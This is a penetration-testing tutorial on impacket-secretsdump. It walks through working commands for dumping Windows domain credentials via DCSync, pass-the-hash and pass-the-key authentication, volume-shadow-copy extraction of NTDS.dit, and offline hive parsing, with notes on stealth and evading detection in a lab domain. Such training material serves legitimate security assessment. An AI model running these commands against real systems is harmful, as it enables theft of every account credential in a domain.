impacket-secretsdump is a powerful post-exploitation tool from the Impacket framework by Fortra that remotely extracts credentials from Windows systems — including NTLM hashes, Kerberos keys, LSA secrets, SAM databases, and cached domain logon info — without dropping any agent or binary on the target.

Table of Contents

1. Introduction
2. What Is secretsdump and How Does It Work?
3. Viewing Help & Available Options
4. Remote Domain Credential Dump via DRSUAPI (DCSync)
   • Just-dc — Domain Credentials Only
   • Just-dc-ntlm — NTLM Hashes Only
   • Just-dc-user — Single User Extraction
5. Authentication Methods
   • Kerberos Ticket Authentication (-k -no-pass)
   • Pass-the-Hash (-hashes)
   • AES Key Authentication (-aesKey)
6. Volume Shadow Copy (VSS) Method
   • SecretsDump with wmiexec + VSS
   • SecretsDump with mmcexec + VSS
7. VSS vs DRSUAPI
8. Filtering & Scoping Output
   • Exclude Specific Users (-skip-user)
   • Password Last Set (-pwd-last-set)
   • Account Status (-user-status)
9. Timestamps and Logging (-ts)
10. Writing to File (-outputfile)
11. Remote Shadow Snapshot via WMI (-use-remoteSSWMI)
12. Offline Credential Extraction (Offline Cracking)
    • Dumping Local SAM Hashes
    • Dump LSA Secrets
    • Offline NTDS Dump
13. Conclusion
14. Disclaimer

What Is secretsdump and How Does It Work?

secretsdump.py (shipped as impacket-secretsdump on Kali) is an agentless credential-extraction framework that can operate both locally and remotely. It uses three distinct mechanisms:

• DRSUAPI (DCSync): Invokes the Directory Replication Service remote protocol to pull password hashes directly from NTDS.DIT on a Domain Controller — no local file access required.
• VSS (Volume Shadow Copy): Uses vssadmin via smbexec/wmiexec/mmcexec to snapshot and copy locked database files (SAM, SYSTEM, NTDS.DIT) before parsing them locally.
• Local Registry Hives: Reads offline SAM + SYSTEM hive files (e.g., acquired via reg save) to decrypt and display local account hashes.

Viewing Help & Available Options

Run impacket-secretsdump -h to see the full option set. The key parameters you will use most often are shown in the image below:

impacket-secretdump -h

Remote Domain Credential Dump via DRSUAPI (DCSync)

RemoteOperations connects to the remote registry over SMB and reads the SAM and SECURITY hives directly. This gives local account hashes, LSA secrets, DCC2 cached logon hashes, DPAPI keys, and DefaultPassword if Auto-Logon is configured.

DRSUAPI uses the DCSync replication protocol to pull the entire NTDS.dit. This always succeeds as long as the account holds Replicating Directory Changes All.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11

Output includes:

NTLM hashes for every domain user (format: username:RID:LMhash:NThash) — including Administrator, Guest, krbtgt, and all domain users like raj, sanjeet, komal, etc.

Kerberos keys (AES-256, AES-128, DES-CBC-MD5) for each user — these can be used for Pass-the-Hash, Pass-the-Ticket, or Golden Ticket attacks

Computer account hashes for DC$, MSEDGEWIN10$, WIN-SQL$, and service accounts like MyGMSA$ and fakepc$

Just-dc — Domain Credentials Only

The -just-dc flag dumps everything from the Domain Controller: all NTLM hashes AND Kerberos keys for every account. This is the most comprehensive single-flag option — producing both the hash table and the full suite of AES/DES Kerberos encryption keys

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc

Breaking it down:

• ignite.local/shivam:Password@1  — domain\username:password authentication
• @192.168.1.11  — IP address of the Domain Controller (target)
• –just-dc  — skip remote SAM / LSA secrets; use DRSUAPI (DCSync) to pull NTDS.DIT secrets only

Just-dc-ntlm — NTLM Hashes Only

This command connects to the Domain Controller at 192.168.1.11 in the ignite.local domain, authenticates as shivam with password Password@1, and uses the DRSUAPI (DCSync) method to extract only NTLM hashes from the NTDS.DIT database — skipping Kerberos keys, LSA secrets, SAM, and DPAPI data entirel

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc-ntlm

Why Use -just-dc-ntlm?

• ⚡ Faster — skips Kerberos key parsing, less data transferred
• 🔕 Less noise — fewer DRSUAPI calls to the DC
• 🎯 Focused — when you only need hashes for PtH or cracking
• 🧹 Cleaner output — easier to pipe into tools like hashcat or netexec

Just-dc-user — Single User Extraction

 This performs a targeted, single-account DCSync — extracting credentials only for the administrator account from the Domain Controller, rather than dumping the entire NTDS.DIT. It is one of the stealthiest credential dumping techniques available in Impacket.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc-user administrator

This retrieves only the Administrator hash and Kerberos keys — useful when you need one specific account’s credentials quickly.

Parameters Explained

 -just-dc-user vs Other Flags

Authentication Methods

Kerberos Ticket (-k -no-pass)

This technique authenticates the Domain Controller entirely via a stolen/forged Kerberos ticket — no plaintext password, no NTLM hash required. It is one of the stealthiest DCSync methods available

In simple terms:

• You already have a Kerberos ticket (.ccache)
• You authenticate using that ticket
• No password or NTLM hash is required
• export KRB5CCNAME=administrator.ccache

impacket-secretsdump ignite.local/administrator@dc.ignite.local -k -no-pass

Pass-the-Hash (-hashes)

This command authenticates to the Domain Controller using shivam’s NTLM hash instead of a plaintext password — a classic Pass-the-Hash (PtH) attack.

impacket-secretsdump ignite.local/shivam@192.168.1.11 -hashes :64FBAE31CC352FC26AF97CBDEF151E03

Parameters Explained

 

 AES Key Authentication (-aesKey)

 This performs a Pass-the-Key (PtK) attack — authenticating to the Domain Controller using the Administrator’s AES-256 Kerberos encryption key instead of a password or NTLM hash.

impacket-secretsdump ignite.local/administrator@dc.ignite.local \ -aesKey 7c1baf269d1918e4a0b02d4420fa0b2b62c8d4eab7cde8d2adafc5c547283940

Auth Method Comparison — All Techniques

 

Volume Shadow Copy (VSS) Method

This command uses Impacket (secretsdump.py) to dump credentials by using  a Volume Shadow Copy of the target system. a completely different technique from DCSync/DRSUAPI.

impacket-secretsdump ignite.local/administrator:Ignite@987@192.168.1.11 -use-vss

The fundamental difference in one sentence: DRSUAPI asks the DC to hand over password data using its own replication protocol — no files touched, no commands executed. VSS physically snapshots the drive and reads the locked files directly — more data, more noise.

When each is the right choice:

• Use DRSUAPI (-just-dc, -just-dc-ntlm, default remote) when you need domain hashes fast and quietly. It fires a single RPC call, gets every NT hash and Kerberos key, and leaves no artifact. The only detection surface is Event 4662 with the DCSync GUIDs from a non-DC source.
• Use VSS (-use-vss) when domain hashes alone aren’t enough. The three scenarios where VSS is irreplaceable:
• You need DefaultPassword — the cleartext admin password from Auto-Logon config, which DRSUAPI never sees because it lives in the SECURITY hive, not NTDS.dit
• You need DPAPI master keys to decrypt browser-saved passwords, certificate private keys, or Credential Manager vault entries
• You need DCC2 cached logon hashes for offline cracking, which exist only in the SECURITY hive on the DC itself

VSS vs DRSUAPI

 SecretsDump with wmiexec + VSS

This performs a VSS-based NTDS.DIT credential dump using WMI (Windows Management Instrumentation) as the remote execution engine instead of the default smbexec. It is the stealthiest variant of the VSS method — leaving fewer forensic artifacts on the target Domain Controller.

impacket-secretsdump ignite.local/administrator:Ignite@987@192.168.1.11 -use-vss -exec-method wmiexec

SecretsDump with mmcexec + VSS

This performs a VSS-based NTDS.DIT credential dump using the MMC20.Application DCOM COM object as the remote execution engine. It is the most unconventional and evasion-focused of the three -exec-method options, abusing a legitimate Windows management interface instead of SMB services or WMI process.

impacket-secretsdump ignite.local/administrator:Ignite@987@192.168.1.11 -use-vss -exec-method mmcexec

What still succeeded before the failure:

mmcexec is only needed for the VSS/NTDS portion. Before trying to snapshot the drive, secretsdump already completed the local phases — SAM hashes, cached domain logon, and LSA secrets are dumped via the registry over SMB (not via the exec method). The Cleaning up… message confirms those phases ran fine. Only the NTDS.dit copy failed.

The three exec methods ranked by reliability and stealth:

Filtering & Scoping Output

This performs a filtered DCSync dump that skips two of the four major credential sources — the SAM hive and the SECURITY hive — and dumps only the NTDS.DIT domain credentials (NTLM hashes + Kerberos keys). 

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -skip-sam -skip-security

Skipping these hives speeds up the dump when you only care about domain credentials and want to avoid the rpc_s_access_denied error from Remote Operations.

When to choose each approach:

Exclude Specific Users (-skip-user)

It checks if the username matches the skip list — and simply skips writing that entry to output.​

In other words, the data may still be accessed internally during enumeration, but those specific user entries are filtered out and never written to the output, keeping the results cleaner, more focused, and less likely to include sensitive or unnecessary accounts.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc -skip-user krbtgt,guest

Password Last Set (-pwd-last-set)

 This performs a DCSync dump of all domain credentials (NTLM hashes + Kerberos keys) and appends the pwdLastSet timestamp to every account’s output line. It reveals exactly when each user’s password was last changed — a goldmine for password auditing, offline cracking prioritization, and identifying stale accounts

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc -pwd-last-set

Account Status (-user-status)

It allows an attacker — or a pen tester — to instantly see which accounts are active vs dormant, prioritizing targets intelligently.​ Key observations from our output: Guest and krbtgt are Disabled; all regular user accounts are Enabled; Administrator is Enabled with a unique hash different from the domain users, confirming it has a separate custom password.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc -user-status

Timestamps and Saving Output

 The -ts flag is a global logging modifier that prepends a timestamp to every single line of logging output produced by impacket-secretsdump. It is the simplest yet most operationally useful flag for log management, forensic reporting, and red team documentation

 Writing to File (-outputfile)

The -outputfile flag saves all dumped credentials to multiple organized files on disk using dump as the base filename. Instead of only printing to the terminal, every secret is written to a dedicated file — making it ideal for offline cracking, reporting, and large-scale domain assessments

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -outputfile dump

cat dump.ntds

Remote Shadow Snapshot via WMI (-use-remoteSSWMI)

This technique first creates the Shadow Snapshot, retrieves an SMB-accessible path to the snapshot volume, then dumps all secrets from the snapshot. It is an alternative when classic VSS exec methods are blocked by endpoint detection controls.

impacket-secretsdump ignite.local/administrator:Ignite@987@192.168.1.11 -use-remoteSSWMI

Dumping Local SAM Hashes

 The simplest use case is reading offline registry hive files captured from a target. it parses locally exported registry hive files on the attacker machine without making any connection to the target.

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Dump LSA Secrets

This is the LSA Secrets-focused offline parsing mode — it decrypts and extracts only the SECURITY hive contents (LSA Secrets, cached domain logons, DPAPI keys, machine passwords) using the bootKey from the SYSTEM hive, with zero network activity

impacket-secretsdump -security SECURITY -system SYSTEM LOCAL

 Offline NTDS Dump

This command parses the NTDS database with the SYSTEM hive, recovers NTLM hashes and Kerberos keys for all domain accounts, and prints them to the console for further post‑exploitation or cracking. Once you have these two files, the entire domain is compromised offline — no DC connection, no authentication, no noise.

impacket-secretsdump -ntds ntds.dit -system system local

Conclusion

Impacket secretsdump is a versatile, multi-mode credential extraction tool that covers everything from offline SAM parsing to full DCSync against a live domain controller. Its ability to authenticate via password, hash, Kerberos ticket, or AES key makes it adaptable to virtually every stage of a penetration test. The richer output options (-pwd-last-set, -user-status, -ts, -outputfile) transform raw hash dumps into actionable intelligence for both offensive teams and blue teamers looking to understand the exposure surface.

Disclaimer: All techniques described in this article were performed in a controlled, isolated lab environment. Use of these tools against systems without explicit written authorization is illegal. Always obtain proper permissions before conducting security assessments.